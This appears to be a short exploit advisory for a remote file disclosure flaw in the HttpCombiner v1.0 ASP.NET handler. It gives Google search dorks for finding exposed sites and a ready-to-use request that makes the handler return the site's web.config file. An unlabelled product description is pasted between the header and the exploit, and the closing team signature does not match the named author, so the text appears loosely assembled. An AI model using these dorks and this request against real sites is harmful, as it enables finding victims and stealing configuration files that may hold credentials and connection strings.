# Exploit Title: HttpCombiner ASP.NET Remote File Disclosure Vulnerability
# Google Dork: [filetype:txt intext:HttpCombiner.ashx]
# Date: 2014-10-10
# Exploit Author: Hoang Anh Thai
# Vendor Homepage: https://myfirstsamplepagebyilyasforassign.googlecode.com/files/HttpCombiner-v1.zip
# Reference: http://www.codeproject.com/KB/aspnet/HttpCombine.aspx
# Affected Versions: HttpCombiner v1.0
# Tested on: Windows 7 / Chrome & Internet Explorer
You can reduce the wait time by using a CDN. Read my previous blog post about using CDN. However, a better solution is to deliver multiple files over one request using an HttpHandler that combines several files and delivers as one output. So, instead of putting many <script> or <link> tag, you just put one <script> and one <link> tag, and point them to the HttpHandler. You tell the handler which files to combine and it delivers those files in one response. This saves browser from making many requests and eliminates the latency.
This Http Handler reads the file names defined in a configuration and combines all those files and delivers as one response. It delivers the response as gzip compressed to save bandwidth. Moreover, it generates proper cache header to cache the response in browser cache, so that, browser does not request it again on future visit.
Google search: [inurl:robots.txt intext:HttpCombiner.ashx]
Result: The robots.txt file contains information "...Disallow: /css/HttpCombiner.ashx..."
Exploit view source web.config: http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml
VULNERABILITY LABORATORY RESEARCH TEAM